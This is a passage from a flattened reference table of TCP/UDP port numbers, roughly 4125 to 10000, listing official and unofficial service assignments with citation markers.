Yes Smartcard-TLS 4125 Unofficial Microsoft Remote Web Workplace administration 4172 Yes Yes Teradici PCoIP 4190 Yes ManageSieve[201] 4195 Yes Yes Yes Yes AWS protocol for cloud remoting solution 4197 Yes Yes Harman International’s HControl protocol for control and monitoring of Audio, Video, Lighting and Control equipment 4198 Unofficial Unofficial Couch Potato Android app[202] 4200 Unofficial Angular app 4201 Unofficial TinyMUD and various derivatives 4222 Unofficial NATS server default port[203] 4226 Unofficial Unofficial Aleph One, a computer game 4242 Unofficial Orthanc – DICOM server[204] Unofficial Quassel distributed IRC client 4243 Unofficial Docker implementations, redistributions, and setups default[205][needs update?] Unofficial CrashPlan 4244 Unofficial Unofficial Viber[206] 4303 Yes Yes Simple Railroad Command Protocol (SRCP) 4307 Yes TrueConf Client — TrueConf Server media data exchange[207] 4321 Yes Referral Whois (RWhois) Protocol[208] 4444 Unofficial Unofficial Oracle WebCenter Content: Content Server—Intradoc Socket port. (formerly known as Oracle Universal Content Management). Unofficial Metasploit’s default listener port[209] Unofficial Unofficial Xvfb X server virtual frame buffer service Unofficial OpenOCD (Telnet)[187] 4444–4445 Unofficial I2P HTTP/S proxy 4486 Yes Yes Integrated Client Message Service (ICMS) 4488 Yes Assigned Apple Wide Area Connectivity Service, used by Back to My Mac[11] 4500 Assigned Yes IPSec NAT Traversal[11] (RFC 3947, RFC 4306) 4502–4534 Yes Microsoft Silverlight connectable ports under non-elevated trust 4505–4506 Unofficial Salt master 4534 Unofficial Armagetron Advanced server default 4560 Unofficial default Log4j socketappender port 4567 Unofficial Sinatra default server port in development mode (HTTP) 4569 Yes Inter-Asterisk eXchange (IAX2) 4604 Yes Identity Registration Protocol 4605 Yes Direct End to End Secure Chat Protocol 4610–4640 Unofficial QualiSystems TestShell Suite Services 4662 Yes Yes OrbitNet Message Service Unofficial Default for older versions of eMule[210] 4664 Unofficial Google Desktop Search 4672 Unofficial Default for older versions of eMule[210] 4711 Unofficial eMule optional web interface[210] 4713 Unofficial PulseAudio sound server 4723 Unofficial Appium open source automation tool 4724 Unofficial Default bootstrap port to use on device to talk to Appium 4728 Yes Computer Associates Desktop and Server Management (DMP)/Port Multiplexer[211] 4730 Yes Yes Gearman’s job server 4739 Yes Yes IP Flow Information Export 4747 Unofficial Apprentice 4753 Yes Yes SIMON (service and discovery) 4789 Yes Virtual eXtensible Local Area Network (VXLAN) 4791 Yes IP Routable RocE (RoCEv2) 4840 Yes Yes OPC UA Connection Protocol (TCP) and OPC UA Multicast Datagram Protocol (UDP) for OPC Unified Architecture from OPC Foundation 4843 Yes Yes OPC UA TCP Protocol over TLS/SSL for OPC Unified Architecture from OPC Foundation 4847 Yes Yes Web Fresh Communication, Quadrion Software & Odorless Entertainment 4848 Unofficial Java, Glassfish Application Server administration default 4894 Yes Yes LysKOM Protocol A 4944 No Unofficial DrayTek DSL Status Monitoring[212] 4949 Yes Munin Resource Monitoring Tool 4950 Yes Yes Cylon Controls UC32 Communications Port 5000 Unofficial UPnP—Windows network device interoperability Unofficial Unofficial VTun, VPN Software Unofficial ASP.NET Core — Development Webserver Unofficial FlightGear multiplayer[213] Unofficial Synology Inc. Management Console, File Station, Audio Station Unofficial Flask Development Webserver Unofficial Heroku console access Unofficial Docker Registry[214] Unofficial AT&T U-verse public, educational, and government access (PEG) streaming over HTTP[215] Unofficial High-Speed SECS Message Services[citation needed] Unofficial 3CX Phone System Management Console/Web Client (HTTP) Unofficial RidgeRun GStreamer Daemon (GSTD) [216] Unofficial Apple’s AirPlay Receiver[217] 5000–5500 No Unofficial League of Legends, a multiplayer online battle arena video game[218] 5001 Unofficial Slingbox and Slingplayer Unofficial Unofficial Iperf (Tool for measuring TCP and UDP bandwidth performance) Unofficial Synology Inc. Secured Management Console, File Station, Audio Station Unofficial 3CX Phone System Management Console/Web Client (HTTPS) 5002 Unofficial ASSA ARX access control system[219] 5003 Yes Assigned FileMaker – name binding and transport[11] 5004 Yes Yes Yes Real-time Transport Protocol media data (RTP) (RFC 3551, RFC 4571) 5005 Yes Yes Yes Real-time Transport Protocol control protocol (RTCP) (RFC 3551, RFC 4571) 5007 Unofficial Palo Alto Networks — User-ID agent 5010 Yes Yes Registered to: TelePath (the IBM FlowMark workflow-management system messaging platform)[220]
The TCP port is now used for: IBM WebSphere MQ Workflow 5011 Yes Yes TelePath (the IBM FlowMark workflow-management system messaging platform)[220] 5022 Unofficial MSSQL Server Replication and Database mirroring endpoints[221] 5025 Yes Yes scpi-raw Standard Commands for Programmable Instruments 5029 Unofficial Sonic Robo Blast 2 and Sonic Robo Blast 2 Kart servers 5031 Unofficial Unofficial AVM CAPI-over-TCP (ISDN over Ethernet tunneling)[citation needed] 5037 Unofficial Android ADB server 5044 Yes Standard port in Filebeats/Logstash implementation of Lumberjack protocol. 5048 Yes Texai Message Service 5050 Unofficial Yahoo! Messenger 5051 Yes ita-agent Symantec Intruder Alert[222] 5060 Yes Yes Session Initiation Protocol (SIP)[11] 5061 Yes[223] Session Initiation Protocol (SIP) over TLS 5062 Yes Yes Localisation access 5064 Yes Yes EPICS Channel Access server[224] 5065 Assigned Yes EPICS Channel Access repeater beacon[224] 5070 Unofficial No Binary Floor Control Protocol (BFCP)[225] 5080 Unofficial Unofficial List of telephone switches#NEC[NEC Phone System] NEC SV8100 and SV9100 MLC Phones Default iSIP Port 5084 Yes Yes EPCglobal Low Level Reader Protocol (LLRP) 5085 Yes Yes EPCglobal Low Level Reader Protocol (LLRP) over TLS 5090 Unofficial Unofficial 3CX Phone System 3CX Tunnel Protocol, 3CX App API, 3CX Session Border Controller 5093 Yes SafeNet, Inc Sentinel LM, Sentinel RMS, License Manager, client-to-server 5099 Yes Yes SafeNet, Inc Sentinel LM, Sentinel RMS, License Manager, server-to-server 5104 Unofficial IBM Tivoli Framework NetCOOL/Impact[226] HTTP Service 5121 Unofficial Neverwinter Nights 5124 Unofficial Unofficial TorgaNET (Micronational Darknet) 5125 Unofficial Unofficial TorgaNET (Micronational Intelligence Darknet) 5150 Yes Yes ATMP Ascend Tunnel Management Protocol[227] 5151 Yes ESRI SDE Instance Yes ESRI SDE Remote Start 5154 Yes Yes BZFlag 5172 Yes PC over IP Endpoint Management[228] 5173 Unofficial Vite 5190 Yes Yes AOL Instant Messenger protocol.[11] The chat app is defunct as of 15 December 2017.[229] 5198 Unofficial EchoLink VoIP Amateur Radio Software (Voice) 5199 Unofficial EchoLink VoIP Amateur Radio Software (Voice) 5200 Unofficial EchoLink VoIP Amateur Radio Software (Information) 5201 Unofficial Unofficial Iperf3 (Tool for measuring TCP and UDP bandwidth performance) 5222 Yes Reserved Extensible Messaging and Presence Protocol (XMPP) client connection[11][230][231] 5223 Unofficial Apple Push Notification Service[11][157] Unofficial Extensible Messaging and Presence Protocol (XMPP) client connection over SSL 5228 Yes HP Virtual Room Service Unofficial Google Play, Android Cloud to Device Messaging Service, Google Cloud Messaging 5242 Unofficial Unofficial Viber[206] 5243 Unofficial Unofficial Viber[206] 5246 Yes Control And Provisioning of Wireless Access Points (CAPWAP) CAPWAP control[232] 5247 Yes Control And Provisioning of Wireless Access Points (CAPWAP) CAPWAP data[232] 5269 Yes Extensible Messaging and Presence Protocol (XMPP) server-to-server connection[11][230][231] 5280 Yes Extensible Messaging and Presence Protocol (XMPP)[233] 5281 Unofficial Extensible Messaging and Presence Protocol (XMPP)[234] 5298 Yes Yes Extensible Messaging and Presence Protocol (XMPP)[235] 5310 Assigned Yes Outlaws, a 1997 first-person shooter video game[236] 5318 Yes Reserved Certificate Management over CMS[237] 5349 Yes Yes STUN over TLS/DTLS, a protocol for NAT traversal[189] Yes Yes TURN over TLS/DTLS, a protocol for NAT traversal[190] Yes Reserved STUN Behavior Discovery over TLS.[191] See also port 3478. 5351 Reserved Yes NAT Port Mapping Protocol and Port Control Protocol—client-requested configuration for connections through network address translators and firewalls 5353 Assigned Yes Multicast DNS (mDNS)[11] 5355 Yes Yes Link-Local Multicast Name Resolution (LLMNR), allows hosts to perform name resolution for hosts on the same local link (only provided by Windows Vista and Server 2008) 5357 Unofficial Unofficial Web Services for Devices (WSDAPI) (only provided by Windows Vista, Windows 7 and Server 2008) 5358 Unofficial Unofficial WSDAPI Applications to Use a Secure Channel (only provided by Windows Vista, Windows 7 and Server 2008) 5394 Unofficial Kega Fusion, a Sega multi-console emulator[238][239] 5402 Yes Yes Multicast File Transfer Protocol (MFTP)[240][importance?] 5405 Yes Yes NetSupport Manager 5412 Yes Yes IBM Rational Synergy (Telelogic Synergy) (Continuus CM) Message Router 5413 Yes Yes Wonderware SuiteLink service 5417 Yes Yes SNS Agent 5421 Yes Yes NetSupport Manager 5432 Yes Assigned PostgreSQL[11] database system 5433 Unofficial Bouwsoft file/webserver[241] 5445 Unofficial Cisco Unified Video Advantage[citation needed] 5450 Unofficial Unofficial OSIsoft PI Server Client Access [242] 5457 Unofficial OSIsoft PI Asset Framework Client Access [243] 5458 Unofficial OSIsoft PI Notifications Client Access [244] 5480 Unofficial VMware VAMI (Virtual Appliance Management Infrastructure)—used for initial setup of various administration settings on Virtual Appliances designed using the VAMI architecture. 5481 Unofficial Schneider Electric’s ClearSCADA (SCADA implementation for Windows) — used for client-to-server communication.[245] 5495 Unofficial IBM Cognos TM1 Admin server 5498 Unofficial Hotline tracker server connection 5499 Unofficial Hotline tracker server discovery 5500 Unofficial Hotline control connection Unofficial VNC Remote Frame Buffer RFB protocol—for incoming listening viewer 5501 Unofficial Hotline file transfer connection 5517 Unofficial Setiqueue Proxy server client for SETI@Home project 5550 Unofficial Hewlett-Packard Data Protector[citation needed] 5554 Unofficial Unofficial Fastboot default wireless port 5555 Unofficial Unofficial Oracle WebCenter Content: Inbound Refinery—Intradoc Socket port. (formerly known as Oracle Universal Content Management). Port though often changed during installation Unofficial Freeciv versions up to 2.0, Hewlett-Packard Data Protector, McAfee EndPoint Encryption Database Server, SAP, Default for Microsoft Dynamics CRM 4.0, Softether VPN default port 5556 Yes Yes Freeciv, Oracle WebLogic Server Node Manager[246] 5568 Yes Yes Session Data Transport (SDT), a part of Architecture for Control Networks (ACN)[247][full citation needed] 5601 Unofficial Kibana[248] 5631 Yes pcANYWHEREdata, Symantec pcAnywhere (version 7.52 and later[249])[250] data 5632 Yes pcANYWHEREstat, Symantec pcAnywhere (version 7.52 and later) status 5656 Unofficial IBM Lotus Sametime p2p file transfer 5666 Unofficial NRPE (Nagios) 5667 Unofficial NSCA (Nagios) 5670 Yes FILEMQ ZeroMQ File Message Queuing Protocol Yes ZRE-DISC ZeroMQ Realtime Exchange Protocol (Discovery) 5671 Yes Assigned Advanced Message Queuing Protocol (AMQP)[251] over TLS 5672 Yes Assigned Yes Advanced Message Queuing Protocol (AMQP)[251] 5678 Unofficial No n8n[252] 5683 Yes Yes Constrained Application Protocol (CoAP) 5684 Yes Yes Constrained Application Protocol Secure (CoAPs) 5693 Unofficial Nagios Cross Platform Agent (NCPA)[253] 5701 Unofficial Hazelcast default communication port[254] 5718 Unofficial Microsoft DPM Data Channel (with the agent coordinator) 5719 Unofficial Microsoft DPM Data Channel (with the protection agent) 5722 Yes Yes Microsoft RPC, DFSR (SYSVOL) Replication Service[citation needed] 5723 Unofficial System Center Operations Manager[255] 5724 Unofficial Operations Manager Console 5741 Yes Yes IDA Discover Port 1 5742 Yes Yes IDA Discover Port 2 5800 Unofficial VNC Remote Frame Buffer RFB protocol over HTTP Unofficial ProjectWise Server[256] 5900 Yes Yes Remote Frame Buffer protocol (RFB) Unofficial Virtual Network Computing (VNC) Remote Frame Buffer RFB protocol[11][257] 5905 Unofficial Windows service «C:Program FilesIntelIntel(R) Online Connect AccessIntelTechnologyAccessService.exe» that listens on 127.0.0.1 5931 Yes Yes AMMYY admin Remote Control 5938 Unofficial Unofficial TeamViewer remote desktop protocol[258] 5984 Yes Yes CouchDB database server 5985 Yes Windows PowerShell Default psSession Port[259] Windows Remote Management Service (WinRM-HTTP)[260] 5986 Yes Windows PowerShell Default psSession Port[259] Windows Remote Management Service (WinRM-HTTPS)[260] 5988–5989 Yes CIM-XML (DMTF Protocol)[261] 6000–6063 Yes Yes X11—used between an X client and server over the network 6005 Unofficial Default for BMC Software Control-M/Server—Socket used for communication between Control-M processes—though often changed during installation Unofficial Default for Camfrog chat & cam client 6009 Unofficial JD Edwards EnterpriseOne ERP system JDENet messaging client listener 6050 Unofficial Arcserve backup 6051 Unofficial Arcserve backup 6086 Yes Peer Distributed Transfer Protocol (PDTP), FTP like file server in a P2P network 6100 Unofficial Vizrt System Unofficial Ventrilo authentication for version 3 6101 Unofficial Backup Exec Agent Browser[citation needed] 6110 Yes Yes softcm, HP Softbench CM 6111 Yes Yes spc, HP Softbench Sub-Process Control 6112 Yes Yes dtspcd, execute commands and launch applications remotely Unofficial Unofficial Blizzard’s Battle.net gaming service and some games,[124] ArenaNet gaming service, Relic gaming service Unofficial Club Penguin Disney online game for kids 6113 Unofficial Club Penguin Disney online game for kids, Used by some Blizzard games[124] 6136 Unofficial ObjectDB database server[262] 6159 Yes ARINC 840 EFB Application Control Interface 6160 Unofficial Veeam Installer Service 6161 Unofficial Veeam vPower NFS Service 6162 Unofficial Veeam Data Mover 6163 Unofficial Veeam Hyper-V Integration Service 6164 Unofficial Veeam WAN Accelerator 6165 Unofficial Veeam WAN Accelerator Data Transfer 6167 Unofficial Veeam Log Shipping Service 6170 Unofficial Veeam Mount Server 6200 Unofficial Oracle WebCenter Content Portable: Content Server (With Native UI) and Inbound Refinery 6201 Assigned Thermo-Calc Software AB: Management of service nodes in a processing grid for thermodynamic calculations Unofficial Oracle WebCenter Content Portable: Admin 6225 Unofficial Oracle WebCenter Content Portable: Content Server Web UI 6227 Unofficial Oracle WebCenter Content Portable: JavaDB 6240 Unofficial Oracle WebCenter Content Portable: Capture 6244 Unofficial Unofficial Oracle WebCenter Content Portable: Content Server—Intradoc Socket port 6255 Unofficial Unofficial Oracle WebCenter Content Portable: Inbound Refinery—Intradoc Socket port 6257 Unofficial WinMX (see also 6699) 6260 Unofficial Unofficial planet M.U.L.E. 6262 Unofficial Sybase Advantage Database Server 6343 Yes SFlow, sFlow traffic monitoring 6346 Yes gnutella-svc, gnutella (FrostWire, Limewire, Shareaza, etc.) 6347 Yes gnutella-rtr, Gnutella alternate 6350 Yes App Discovery and Access Protocol 6379 Yes Redis key-value data store 6389 Unofficial EMC CLARiiON 6432 Yes PgBouncer—A connection pooler for PostgreSQL 6436 Unofficial Leap Motion Websocket Server TLS 6437 Unofficial Leap Motion Websocket Server 6443 Yes Kubernetes API server [263] 6444 Yes Sun Grid Engine Qmaster Service 6445 Yes Sun Grid Engine Execution Service 6454 Unofficial Art-Net protocol 6463–6472 Unofficial Discord RPC[264] 6464 Yes Port assignment for medical device communication in accordance to IEEE 11073-20701 6513 Yes NETCONF over TLS 6514 Yes Syslog over TLS[265] 6515 Yes Elipse RPC Protocol (REC) 6516 Unofficial Windows Admin Center 6543 Unofficial Pylons project#Pyramid Default Pylons Pyramid web service port 6556 Unofficial Check MK Agent 6566 Yes SANE (Scanner Access Now Easy)—SANE network scanner daemon[266] 6560–6561 Unofficial Speech-Dispatcher daemon[citation needed] 6571 Unofficial Windows Live FolderShare client 6600 Yes Microsoft Hyper-V Live Unofficial Music Player Daemon (MPD) 6601 Yes Microsoft Forefront Threat Management Gateway 6602 Yes Microsoft Windows WSS Communication 6619 Yes odette-ftps, Odette File Transfer Protocol (OFTP) over TLS/SSL 6622 Yes Multicast FTP 6653 Yes Assigned OpenFlow[citation needed] 6660–6664 Unofficial Internet Relay Chat (IRC) 6665–6669 Yes Internet Relay Chat (IRC) 6679 Yes Osorno Automation Protocol (OSAUT) Unofficial Internet Relay Chat (IRC) SSL (Secure Internet Relay Chat)—often used 6690 Unofficial Synology Cloud station 6697 Yes IRC SSL (Secure Internet Relay Chat)—often used 6699 Unofficial WinMX (see also 6257) 6715 Unofficial AberMUD and derivatives default port 6771 Unofficial BitTorrent Local Peer Discovery 6783–6785 Unofficial Splashtop Remote server broadcast 6801 Yes ACNET Control System Protocol 6881–6887 Unofficial Unofficial BitTorrent beginning of range of ports used most often 6888 Yes MUSE Unofficial Unofficial BitTorrent continuation of range of ports used most often 6889–6890 Unofficial Unofficial BitTorrent continuation of range of ports used most often 6891–6900 Unofficial Unofficial BitTorrent continuation of range of ports used most often 6891–6900 Unofficial Unofficial Windows Live Messenger (File transfer) 6901 Unofficial Unofficial Windows Live Messenger (Voice) Unofficial Unofficial BitTorrent continuation of range of ports used most often 6902–6968 Unofficial Unofficial BitTorrent continuation of range of ports used most often 6924 Yes split-ping, ping with RX/TX latency/loss split 6969 Yes acmsoda Unofficial BitTorrent tracker 6970–6999 Unofficial Unofficial BitTorrent end of range of ports used most often Unofficial QuickTime Streaming Server[11] 6980 Unofficial Voicemeeter VBAN network audio protocol[267] 7000 Unofficial Default for Vuze’s built-in HTTPS Bittorrent tracker Unofficial Avira Server Management Console 7001 Unofficial Avira Server Management Console Unofficial Default for BEA WebLogic Server’s HTTP server, though often changed during installation 7002 Unofficial Default for BEA WebLogic Server’s HTTPS server, though often changed during installation 7005 Unofficial Default for BMC Software Control-M/Server and Control-M/Agent for Agent-to-Server, though often changed during installation 7006 Unofficial Default for BMC Software Control-M/Server and Control-M/Agent for Server-to-Agent, though often changed during installation 7010 Unofficial Default for Cisco AON AMC (AON Management Console)[268] 7022 Unofficial Database mirroring endpoints[221] 7023 Yes Bryan Wilcutt T2-NMCS Protocol for SatCom Modems 7025 Unofficial Zimbra LMTP [mailbox]—local mail delivery 7047 Unofficial Zimbra conversion server 7070 Unofficial Unofficial Real Time Streaming Protocol (RTSP), used by QuickTime Streaming Server. TCP is used by default, UDP is used as an alternate.[11] 7077 Yes Development-Network Authentification-Protocol 7133 Unofficial Enemy Territory: Quake Wars 7144 Unofficial Peercast[citation needed] 7145 Unofficial Peercast[citation needed] 7171 Unofficial Tibia 7262 Yes CNAP (Calypso Network Access Protocol) 7272 Yes WatchMe — WatchMe Monitoring 7306 Unofficial Zimbra mysql [mailbox][citation needed] 7307 Unofficial Zimbra mysql [logger][citation needed] 7312 Unofficial Sibelius License Server 7396 Unofficial Web control interface for Folding@home v7.3.6 and later[269] 7400 Yes RTPS (Real Time Publish Subscribe) DDS Discovery 7401 Yes RTPS (Real Time Publish Subscribe) DDS User-Traffic 7402 Yes RTPS (Real Time Publish Subscribe) DDS Meta-Traffic 7471 Unofficial Stateless Transport Tunneling (STT) 7473 Yes Rise: The Vieneo Province 7474 Yes Neo4J Server webadmin[270] 7478 Yes Default port used by Open iT Server.[271] 7542 Yes Saratoga file transfer protocol[272][273] 7547 Yes CPE WAN Management Protocol (CWMP) Technical Report 069 7575 Unofficial Populous: The Beginning server 7624 Yes Instrument Neutral Distributed Interface 7631 Yes ERLPhase 7634 Unofficial hddtemp—Utility to monitor hard drive temperature 7652–7654 Unofficial I2P anonymizing overlay network 7655 Unofficial I2P SAM Bridge Socket API 7656–7660 Unofficial I2P anonymizing overlay network 7670 Unofficial BrettspielWelt BSW Boardgame Portal 7680 Unofficial Delivery Optimization for Windows 10[274] 7687 Yes Bolt database connection 7707–7708 Unofficial Killing Floor 7717 Unofficial Killing Floor 7777 Unofficial iChat server file transfer proxy[11] Unofficial Oracle Cluster File System 2[citation needed] Unofficial Windows backdoor program tini.exe default[citation needed] Unofficial Just Cause 2: Multiplayer Mod Server[citation needed] Unofficial Terraria default server Unofficial San Andreas Multiplayer (SA-MP) default port server Unofficial SCP: Secret Laboratory Multiplayer Server 7777–7788 Unofficial Unofficial Unreal Tournament series default server[citation needed] 7831 Unofficial Default used by Smartlaunch Internet Cafe Administration[275] software 7880 Unofficial Unofficial PowerSchool Gradebook Server[citation needed] 7890 Unofficial Default that will be used by the iControl Internet Cafe Suite Administration software 7915 Unofficial Default for YSFlight server[276] 7935 Unofficial Fixed port used for Adobe Flash Debug Player to communicate with a debugger (Flash IDE, Flex Builder or fdb).[277] 7946 Unofficial Unofficial Docker Swarm communication among nodes[164] 7979 Unofficial Used by SilverBluff Studios for communication between servers and clients.[citation needed] 7990 Unofficial Atlassian Bitbucket (default port)[citation needed] 8000 Unofficial Commonly used for Internet radio streams such as SHOUTcast[citation needed], Icecast[citation needed] and iTunes Radio[11] Unofficial DynamoDB Local[278] Unofficial Django Development Webserver[279] Unofficial Python 3 http.server[280] 8005 Unofficial Tomcat remote shutdown[11] Unofficial PLATO ASCII protocol (RFC 600) Unofficial Windows SCCM HTTP listener service[281] 8006 Unofficial Quest AppAssure 5 API[282] Unofficial No Proxmox Virtual Environment admin web interface[283] 8007 Unofficial Quest AppAssure 5 Engine[282] 8007 Yes Proxmox Backup Server admin web interface 8008 Unofficial Unofficial Alternative port for HTTP. See also ports 80 and 8080. Unofficial IBM HTTP Server administration default[importance?] Unofficial iCal, a calendar application by Apple[11] Unofficial No Matrix homeserver federation over HTTP[284] 8009 Unofficial Apache JServ Protocol (ajp13)[citation needed] 8010 Unofficial No Buildbot web status page[citation needed] 8042 Unofficial Orthanc – REST API over HTTP[204] 8069 Unofficial OpenERP 5.0 XML-RPC protocol[285] 8070 Unofficial OpenERP 5.0 NET-RPC protocol[285] 8074 Yes Gadu-Gadu 8075 Unofficial Killing Floor web administration interface[citation needed] 8080 Yes Alternative port for HTTP. See also ports 80 and 8008. Unofficial Apache Tomcat[286] Unofficial Atlassian JIRA applications[287] 8081 Yes Yes Sun Proxy Admin Service[288] 8088 Unofficial Asterisk management access via HTTP[citation needed] 8089 Unofficial No Splunk daemon management[289] Unofficial Fritz!Box automatic TR-069 configuration[290] 8090 Unofficial Atlassian Confluence[291] Unofficial Coral Content Distribution Network (legacy; 80 and 8080 now supported)[292] Unofficial Matrix identity server[citation needed] 8091 Unofficial CouchBase web administration[293] 8092 Unofficial CouchBase API[293] 8096 Unofficial Emby and Jellyfin HTTP port[294] 8111 Unofficial JOSM Remote Control 8112 Unofficial PAC Pacifica Coin 8116 Unofficial Check Point Cluster Control Protocol 8118 Yes Privoxy—advertisement-filtering Web proxy 8123 Unofficial Polipo Web proxy Unofficial Home Assistant Home automation Unofficial BURST P2P[295] 8124 Unofficial Standard BURST Mining Pool Software Port 8125 Unofficial BURST Web Interface 8139 Unofficial Puppet (software) Client agent 8140 Yes Puppet (software) Master server 8172 Unofficial Microsoft Remote Administration for IIS Manager[296] 8184 Unofficial NCSA Brown Dog Data Access Proxy 8194–8195 Yes Bloomberg Terminal[297] 8200 Unofficial GoToMyPC Unofficial MiniDLNA media server Web Interface 8222 Unofficial VMware VI Web Access via HTTP[298] 8243 Yes HTTPS listener for Apache Synapse[299] 8245 Unofficial Dynamic DNS for at least No-IP and DynDNS[300] 8280 Yes HTTP listener for Apache Synapse[299] 8281 Unofficial HTTP Listener for Gatecraft Plugin 8291 Unofficial Winbox—Default on a MikroTik RouterOS for a Windows application used to administer MikroTik RouterOS[301] 8303 Unofficial Teeworlds Server 8332 Unofficial Bitcoin JSON-RPC server[302] 8333 Unofficial Bitcoin[303] Unofficial VMware VI Web Access via HTTPS[298] 8334 Unofficial Filestash server (default) [304] 8337 Unofficial VisualSVN Distributed File System Service (VDFS)[305] 8384 Unofficial Syncthing web GUI 8388 Unofficial Shadowsocks proxy server[citation needed] 8400 Yes Commvault Communications Service (GxCVD, found in all client computers) 8401 Yes Commvault Server Event Manager (GxEvMgrS, available in CommServe) 8403 Yes Commvault Firewall (GxFWD, tunnel port for HTTP/HTTPS) 8443 Unofficial SW Soft Plesk Control Panel Unofficial Apache Tomcat SSL Unofficial Promise WebPAM SSL Unofficial iCal over SSL[11] Unofficial MineOs WebUi 8444 Unofficial Bitmessage 8448 Unofficial No Matrix homeserver federation over HTTPS[284] 8484 Unofficial MapleStory Login Server 8500 Unofficial Adobe ColdFusion built-in web server[306] 8530 Unofficial Windows Server Update Services over HTTP, when using the default role installation settings in Windows Server 2012 and later versions.[307][308] 8531 Unofficial Windows Server Update Services over HTTPS, when using the default role installation settings in Windows Server 2012 and later versions.[307][308] 8555 Unofficial Symantec DLP OCR Engine [309] 8580 Unofficial Freegate, an Internet anonymizer and proxy tool[310] 8629 Unofficial Tibero database[citation needed] 8642 Unofficial Lotus Notes Traveler auto synchronization for Windows Mobile and Nokia devices[311] 8691 Unofficial Ultra Fractal, a fractal generation and rendering software application – distributed calculations over networked computers[312][313] 8765 Unofficial No Default port of a local GUN relay peer that the Internet Archive[314] and others use as a decentralized mirror for censorship resistance.[315] 8767 Unofficial Voice channel of TeamSpeak 2,[316] a proprietary Voice over IP protocol targeted at gamers[citation needed] 8834 Unofficial Nessus, a vulnerability scanner – remote XML-RPC web server[317][third-party source needed] 8840 Unofficial Opera Unite, an extensible framework for web applications[318][319] 8880 Yes Alternate port of CDDB (Compact Disc Database) protocol, used to look up audio CD (compact disc) information over the Internet.[320] See also port 888. Unofficial IBM WebSphere Application Server SOAP connector[321][jargon] 8883 Yes Secure MQTT (MQTT over TLS)[322][323] 8887 Unofficial HyperVM over HTTP[citation needed] 8888 Unofficial HyperVM over HTTPS[citation needed] Unofficial No Freenet web UI (localhost only)[citation needed] Unofficial Default for IPython[324] / Jupyter[325] notebook dashboards Unofficial MAMP[326] 8889 Unofficial MAMP[326] 8920 Unofficial Jellyfin HTTPS port[294] 8983 Unofficial Apache Solr[327] 8997 Unofficial Alternate port for I2P Monotone Proxy[175][jargon] 8998 Unofficial I2P Monotone Proxy[175][jargon] 8999 Unofficial Alternate port for I2P Monotone Proxy[175][jargon] 9000 Unofficial SonarQube Web Server[328] Unofficial ClickHouse default port Unofficial DBGp Unofficial SqueezeCenter web server & streaming Unofficial UDPCast Unofficial Play Framework web server[329] Unofficial Hadoop NameNode default port Unofficial PHP-FPM default port Unofficial QBittorrent’s embedded torrent tracker default port[330] 9001 Yes ETL Service Manager[331] Unofficial Microsoft SharePoint authoring environment Unofficial cisco-xremote router configuration[citation needed] Unofficial Tor network default Unofficial DBGp Proxy Unofficial HSQLDB default port 9002 Unofficial Newforma Server comms 9006 Reserved[2] Unofficial Tomcat in standalone mode[11] 9030 Unofficial Tor often used 9042 Unofficial Apache Cassandra native protocol clients 9043 Unofficial WebSphere Application Server Administration Console secure 9050–9051 Unofficial Tor (SOCKS-5 proxy client) 9060 Unofficial WebSphere Application Server Administration Console 9080 Yes glrpc, Groove Collaboration software GLRPC Unofficial WebSphere Application Server HTTP Transport (port 1) default Unofficial Remote Potato by FatAttitude, Windows Media Center addon Unofficial ServerWMC, Windows Media Center addon 9081 Unofficial Zerto ZVM to ZVM communication 9090 Unofficial Prometheus metrics server Unofficial Openfire Administration Console Unofficial SqueezeCenter control (CLI) Unofficial Cherokee Admin Panel 9091 Unofficial Openfire Administration Console (SSL Secured) Unofficial Transmission (BitTorrent client) Web Interface 9092 Unofficial H2 (DBMS) Database Server Unofficial Apache Kafka A Distributed Streaming Platform[332] 9100 Yes Assigned PDL Data Stream, used for printing to certain network printers[11] 9101 Yes Bacula Director 9102 Yes Bacula File Daemon 9103 Yes Bacula Storage Daemon 9119 Yes MXit Instant Messenger 9150 Unofficial Tor Browser 9191 Unofficial Sierra Wireless Airlink 9199 Unofficial Avtex LLC—qStats 9200 Unofficial Elasticsearch[333]—default Elasticsearch port 9217 Unofficial iPass Platform Service 9293 Unofficial Sony PlayStation RemotePlay[334] 9295 Unofficial Unofficial Sony PlayStation Remote Play Session creation communication port 9296 Unofficial Sony PlayStation Remote Play 9897 Unofficial Sony PlayStation Remote Play Video stream 9300 Unofficial IBM Cognos BI[citation needed] 9303 Unofficial D-Link Shareport Share storage and MFP printers[citation needed] 9306 Yes Sphinx Native API 9309 Unofficial Unofficial Sony PlayStation Vita Host Collaboration WiFi Data Transfer[335] 9312 Yes Sphinx SphinxQL 9332 Unofficial Litecoin JSON-RPC server 9333 Unofficial Litecoin 9339 Unofficial Used by all Supercell games such as Brawl Stars and Clash of Clans, mobile freemium strategy video games 9389 Yes adws, Microsoft AD DS Web Services, Powershell uses this port 9392 Unofficial No OpenVAS Greenbone Security Assistant web interface 9418 Yes git, Git pack transfer service 9419 Unofficial MooseFS distributed file system – master control port[336] 9420 Unofficial MooseFS distributed file system – master command port[336] 9421 Unofficial MooseFS distributed file system – master client port[336] 9422 Unofficial MooseFS distributed file system – Chunkservers[336] 9425 Unofficial MooseFS distributed file system – CGI server[336] 9443 Unofficial VMware Websense Triton console (HTTPS port used for accessing and administrating a vCenter Server via the Web Management Interface) Unofficial NCSA Brown Dog Data Tilling Service 9535 Yes mngsuite, LANDesk Management Suite Remote Control 9536 Yes laes-bf, IP Fabrics Surveillance buffering function 9600 No Unofficial Factory Interface Network Service (FINS), a network protocol used by Omron programmable logic controllers[citation needed] 9669 Unofficial No VGG Image Search Engine VISE 9675 Unofficial Unofficial Spiceworks Desktop, IT Helpdesk Software 9676 Unofficial Unofficial Spiceworks Desktop, IT Helpdesk Software 9695 Yes Content centric networking (CCN, CCNx)[citation needed] 9735 Unofficial Bitcoin Lightning Network[337] 9785 Unofficial Unofficial Viber[206] 9800 Yes WebDAV Source Unofficial WebCT e-learning portal 9875 Unofficial Club Penguin Disney online game for kids 9898 Unofficial Tripwire—File Integrity Monitoring Software[338] 9899 Yes SCTP tunneling (port number used in SCTP packets encapsulated in UDP, RFC 6951) 9901 Unofficial Banana for Apache Solr 9981 Unofficial Tvheadend HTTP server (web interface)[339] 9982 Unofficial Tvheadend HTSP server (Streaming protocol)[339] 9987 Unofficial No TeamSpeak 3 server default (voice) port (for the conflicting service see the IANA list)[340] 9993 Unofficial ZeroTier Default port for ZeroTier 9997 Unofficial Splunk port for communication between the forwarders and indexers 9999 Unofficial Urchin Web Analytics[citation needed] 9999 Unofficial Dash (cryptocurrency)[341] 10000 Yes Network Data Management Protocol (NDMP) Control stream for network backup and restore. 